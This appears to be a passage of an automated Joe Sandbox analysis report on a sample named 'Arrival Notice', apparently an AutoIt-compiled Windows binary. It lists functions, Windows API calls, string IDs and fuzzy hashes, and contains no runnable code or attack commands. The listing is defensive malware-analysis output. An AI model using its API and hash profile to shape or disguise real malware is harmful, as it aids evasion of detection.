                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Menu$Item$CountCreateInfoInsertPopup
                  • String ID: 0$2
                  • API String ID: 93392585-3793063076
                  • Opcode ID: 41d884ff71d02a3bcdec895c5a99e34cfbb3a93960d0377731552ee96baff134
                  • Instruction ID: cb7d11838a69b93171643ccbce537f0e1090d7da4711704e543398325950d2ac
                  • Opcode Fuzzy Hash: 41d884ff71d02a3bcdec895c5a99e34cfbb3a93960d0377731552ee96baff134
                  • Instruction Fuzzy Hash: 6451BF70A00205ABDB19CFA9E8C4BEEBBF5EF49314F14416EE441D7390D7789981CB9A
                  Function 003D2D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                  Download Yara Rule
                  APIs
                  • _ValidateLocalCookies.LIBCMT ref: 003D2D4B
                  • ___except_validate_context_record.LIBVCRUNTIME ref: 003D2D53
                  • _ValidateLocalCookies.LIBCMT ref: 003D2DE1
                  • __IsNonwritableInCurrentImage.LIBCMT ref: 003D2E0C
                  • _ValidateLocalCookies.LIBCMT ref: 003D2E61
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                  • String ID: &H=$csm
                  • API String ID: 1170836740-1825882931
                  • Opcode ID: 6072ca1b43d4e1f232ef885fe0f337ea4bb1eec8e8e1e8e13137dec9ff043269
                  • Instruction ID: 86e4ca47e1e106977ae5892743878c07215b1f57997587e4345b02c232326f0d
                  • Opcode Fuzzy Hash: 6072ca1b43d4e1f232ef885fe0f337ea4bb1eec8e8e1e8e13137dec9ff043269
                  • Instruction Fuzzy Hash: EC41A436E00209ABCF12DF68E845A9FBBB5BF54314F158167E8246B352D7319E05CBD1
                  Function 0041C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                  Download Yara Rule
                  APIs
                  • LoadIconW.USER32(00000000,00007F03), ref: 0041C913
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: IconLoad
                  • String ID: blank$info$question$stop$warning
                  • API String ID: 2457776203-404129466
                  • Opcode ID: a6c0f2f7418e9f964c882979897fd1218ead8c9103fe58b4f1c7c94810727b9f
                  • Instruction ID: 738e5bef0a0a5fafaab3de3ab6d39bb64d6763a1c8542dcab7fb76363e5a797e
                  • Opcode Fuzzy Hash: a6c0f2f7418e9f964c882979897fd1218ead8c9103fe58b4f1c7c94810727b9f
                  • Instruction Fuzzy Hash: 28115B726D9706BBA7056B14ACC3DEF239CCF15364B20002BF404AE382D7785E8052AD
                  Function 0041ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen$LocalTime
                  • String ID:
                  • API String ID: 952045576-0
                  • Opcode ID: 06f5d59f7d64faf30be5b7592e25142b4ae6df68760d7f49f80d594e025b1ac2
                  • Instruction ID: 35152316ad8db58a07932cbf4688054dcbe8d8d0a157e56b5275571f0bbe6c54
                  • Opcode Fuzzy Hash: 06f5d59f7d64faf30be5b7592e25142b4ae6df68760d7f49f80d594e025b1ac2
                  • Instruction Fuzzy Hash: E5418466C1021876CB12EBB59C8B9CF77A8AF45710F504863F914E7222FB34E255C7E9
                  Function 003CF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                  Download Yara Rule
                  APIs
                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0040682C,00000004,00000000,00000000), ref: 003CF953
                  • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0040682C,00000004,00000000,00000000), ref: 0040F3D1
                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0040682C,00000004,00000000,00000000), ref: 0040F454
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ShowWindow
                  • String ID:
                  • API String ID: 1268545403-0
                  • Opcode ID: 61d6c536276c81a4f5f425bb7c87ea5ae5715534bb2ef9e1d8396eafd57ed167
                  • Instruction ID: 4348a4535b0215f9cb5c5d663f5e6de501067dd952e6cf3444d347fe37c83ed4
                  • Opcode Fuzzy Hash: 61d6c536276c81a4f5f425bb7c87ea5ae5715534bb2ef9e1d8396eafd57ed167
                  • Instruction Fuzzy Hash: AE412C31214740BECF7A9B298888F2A7B97AB57314F19443EE447E69A0C736AC84CB15
                  Function 00442D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                  Download Yara Rule
                  APIs
                  • DeleteObject.GDI32(00000000), ref: 00442D1B
                  • GetDC.USER32(00000000), ref: 00442D23
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00442D2E
                  • ReleaseDC.USER32(00000000,00000000), ref: 00442D3A
                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00442D76
                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00442D87
                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00445A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00442DC2
                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00442DE1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                  • String ID:
                  • API String ID: 3864802216-0
                  • Opcode ID: 1a3b8a9f78713505ab00856357754e86acbde392b93ad6e25ccc3ef08477db40
                  • Instruction ID: 44125365a9ca60cf48aa8d24c65fb3de5d9bb380c76762a7f0a921968fd967e8
                  • Opcode Fuzzy Hash: 1a3b8a9f78713505ab00856357754e86acbde392b93ad6e25ccc3ef08477db40
                  • Instruction Fuzzy Hash: 72317176102614BFFB514F50CC89FEB3FA9EF0A755F084065FE089A291C6B59C51C7A8
                  Function 00415622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _memcmp
                  • String ID:
                  • API String ID: 2931989736-0
                  • Opcode ID: bf04dac1c368ea5c80acd0e14a52e3ad34c128e311783272030a736d676cd291
                  • Instruction ID: 467e840e8e5af424e51cab694c3da4d8e0f0ad0187f2d4696fcc0dd4c5f9ec0a
                  • Opcode Fuzzy Hash: bf04dac1c368ea5c80acd0e14a52e3ad34c128e311783272030a736d676cd291
                  • Instruction Fuzzy Hash: 6D2195B6640A09FBE21555219D82FFB235CAEA1384F540023FD089E782F768ED5581ED
                  Function 00434FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID: NULL Pointer assignment$Not an Object type
                  • API String ID: 0-572801152
                  • Opcode ID: daa99863f034f70c5be92eb50e66f5dbfeb2b240d8bea5a93b86fe5f662dd4eb
                  • Instruction ID: 4b995313861686ad055782eca81f75e68f2d00df3267f00b4e348635017a018e
                  • Opcode Fuzzy Hash: daa99863f034f70c5be92eb50e66f5dbfeb2b240d8bea5a93b86fe5f662dd4eb
                  • Instruction Fuzzy Hash: 3DD1C071A0060AAFDF14CFA8C880BAEB7B5BF48344F14906AE915AB381E775DD45CB94
                  Function 003F1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                  Download Yara Rule
                  APIs
                  • GetCPInfo.KERNEL32(?,?), ref: 003F15CE
                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 003F1651
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003F16E4
                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 003F16FB
                    • Part of subcall function 003E3820: RtlAllocateHeap.NTDLL(00000000,?,00481444,?,003CFDF5,?,?,003BA976,00000010,00481440,003B13FC,?,003B13C6,?,003B1129), ref: 003E3852
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003F1777
                  • __freea.LIBCMT ref: 003F17A2
                  • __freea.LIBCMT ref: 003F17AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                  • String ID:
                  • API String ID: 2829977744-0
                  • Opcode ID: 8e355a04a480975a6e8ce0f6303d6a0054184ad73710c3d8f3257a178f7415f1
                  • Instruction ID: b806bbfccc69a0cc0a78c940b6658f5d9038c7fcaf7d2a0c3eb1b8e1f7bec5e3
                  • Opcode Fuzzy Hash: 8e355a04a480975a6e8ce0f6303d6a0054184ad73710c3d8f3257a178f7415f1
                  • Instruction Fuzzy Hash: B491D672E0021EDADF229F74E881AFE7BB59F45310F190669EA09EB290D735DC44CB60
                  Function 00434523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Variant$ClearInit
                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                  • API String ID: 2610073882-625585964
                  • Opcode ID: 4dbd0715f2c6bd2600e42eef359c9c48b5f65b92c610a7923f6519d2ddf1ba1f
                  • Instruction ID: c29a02e091ef36a0d0db7ba30b115dd0110bc83adf263ce3d4f0019c40c24dee
                  • Opcode Fuzzy Hash: 4dbd0715f2c6bd2600e42eef359c9c48b5f65b92c610a7923f6519d2ddf1ba1f
                  • Instruction Fuzzy Hash: E8919471A00215ABDF20CFA5C845FEF7BB8EF8A714F10855AF505AB281D778A941CFA4
                  Function 00421187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                  Download Yara Rule
                  APIs
                  • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0042125C
                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00421284
                  • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 004212A8
                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004212D8
                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0042135F
                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004213C4
                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00421430
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ArraySafe$Data$Access$UnaccessVartype
                  • String ID:
                  • API String ID: 2550207440-0
                  • Opcode ID: 02bb3a93040085e7a8d0198f1be5117d1117438b32b32bf2dca12afde70d223e
                  • Instruction ID: 9a9e2a3f3ac395dd8304525f7825af7b9aa4068251cc2e7dfa050323bbbc297f
                  • Opcode Fuzzy Hash: 02bb3a93040085e7a8d0198f1be5117d1117438b32b32bf2dca12afde70d223e
                  • Instruction Fuzzy Hash: 1E912575B00228DFDB01DF94E884BBE77B5FF15314F54406AE900EB2A1D778A941CBA8
                  Function 003C948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ObjectSelect$BeginCreatePath
                  • String ID:
                  • API String ID: 3225163088-0
                  • Opcode ID: cb8ef1a054102f7fa4bf2ff22773fc774d827a15f3ee31a18d80c0f116f57758
                  • Instruction ID: 6e9a03fc9804857343408220b95753d929183fbafbf1e24a3ab1e17e9e3b3f0a
                  • Opcode Fuzzy Hash: cb8ef1a054102f7fa4bf2ff22773fc774d827a15f3ee31a18d80c0f116f57758
                  • Instruction Fuzzy Hash: 8C912771D00219EFCB11CFA9C888AEEBBB8FF49320F15805AE515B7291D678AD41CB60
                  Function 00433947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                  Download Yara Rule
                  APIs
                  • VariantInit.OLEAUT32(?), ref: 0043396B
                  • CharUpperBuffW.USER32(?,?), ref: 00433A7A
                  • _wcslen.LIBCMT ref: 00433A8A
                  • VariantClear.OLEAUT32(?), ref: 00433C1F
                    • Part of subcall function 00420CDF: VariantInit.OLEAUT32(00000000), ref: 00420D1F
                    • Part of subcall function 00420CDF: VariantCopy.OLEAUT32(?,?), ref: 00420D28
                    • Part of subcall function 00420CDF: VariantClear.OLEAUT32(?), ref: 00420D34
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                  • API String ID: 4137639002-1221869570
                  • Opcode ID: db9ecf94ea66c80bd9b6cf21fa28021be7df4aeaecc9f553f2aafccac7531c30
                  • Instruction ID: 36f387efd078ed96282f04d9ff1ac315a324075b4884666100c4accef0f3459b
                  • Opcode Fuzzy Hash: db9ecf94ea66c80bd9b6cf21fa28021be7df4aeaecc9f553f2aafccac7531c30
                  • Instruction Fuzzy Hash: 1D9178756083019FC700EF24C48196AB7E4FF89319F14886EF98A9B351DB34EE46CB96
                  Function 00434BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0041000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0040FF41,80070057,?,?,?,0041035E), ref: 0041002B
                    • Part of subcall function 0041000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0040FF41,80070057,?,?), ref: 00410046
                    • Part of subcall function 0041000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0040FF41,80070057,?,?), ref: 00410054
                    • Part of subcall function 0041000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0040FF41,80070057,?), ref: 00410064
                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00434C51
                  • _wcslen.LIBCMT ref: 00434D59
                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00434DCF
                  • CoTaskMemFree.OLE32(?), ref: 00434DDA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                  • String ID: NULL Pointer assignment
                  • API String ID: 614568839-2785691316
                  • Opcode ID: ff00d8c308b012abc2738b6067a708198b823d18cdeea51257b699c555ca02e6
                  • Instruction ID: 6b06ff2ff8256f00486a3410027187cc6ecfbf1b1394fff643096eac1ff0919e
                  • Opcode Fuzzy Hash: ff00d8c308b012abc2738b6067a708198b823d18cdeea51257b699c555ca02e6
                  • Instruction Fuzzy Hash: 22913871D0021DAFDF11DFA4D891AEEB7B8FF48304F10816AE915AB251EB34AA45CF64
                  Function 004420FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetMenu.USER32(?), ref: 00442183
                  • GetMenuItemCount.USER32(00000000), ref: 004421B5
                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004421DD
                  • _wcslen.LIBCMT ref: 00442213
                  • GetMenuItemID.USER32(?,?), ref: 0044224D
                  • GetSubMenu.USER32(?,?), ref: 0044225B
                    • Part of subcall function 00413A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00413A57
                    • Part of subcall function 00413A3D: GetCurrentThreadId.KERNEL32 ref: 00413A5E
                    • Part of subcall function 00413A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004125B3), ref: 00413A65
                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004422E3
                    • Part of subcall function 0041E97B: Sleep.KERNEL32 ref: 0041E9F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                  • String ID:
                  • API String ID: 4196846111-0
                  • Opcode ID: c7635240d2f2d345e7781aa019da90bc25f78d23a5acbd589f9fd326c6c85457
                  • Instruction ID: f6a7e63839122f9c5662e2f1e9b22b66600faf50d375e041176587d5e2403579
                  • Opcode Fuzzy Hash: c7635240d2f2d345e7781aa019da90bc25f78d23a5acbd589f9fd326c6c85457
                  • Instruction Fuzzy Hash: 0171AF35A00215AFDB11DF64C981AAEB7F1FF48310F5484AAF916EB341DBB8AD418B94
                  Function 0041AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetParent.USER32(?), ref: 0041AEF9
                  • GetKeyboardState.USER32(?), ref: 0041AF0E
                  • SetKeyboardState.USER32(?), ref: 0041AF6F
                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 0041AF9D
                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 0041AFBC
                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 0041AFFD
                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0041B020
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessagePost$KeyboardState$Parent
                  • String ID:
                  • API String ID: 87235514-0
                  • Opcode ID: 09395d0fea8a527da9a501e50349555eb522fbe013557698f94a79c0c55f81e8
                  • Instruction ID: 256f4ab3e2fb60bf1c8c43596436b1e96a7c1972fb32b66d0629fd559f54a477
                  • Opcode Fuzzy Hash: 09395d0fea8a527da9a501e50349555eb522fbe013557698f94a79c0c55f81e8
                  • Instruction Fuzzy Hash: 1951E3B06057D53DFB3682348C49BFB7EA99B06304F08848AF1D9455C2C3ACACD9D7A9
                  Function 0041ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetParent.USER32(00000000), ref: 0041AD19
                  • GetKeyboardState.USER32(?), ref: 0041AD2E
                  • SetKeyboardState.USER32(?), ref: 0041AD8F
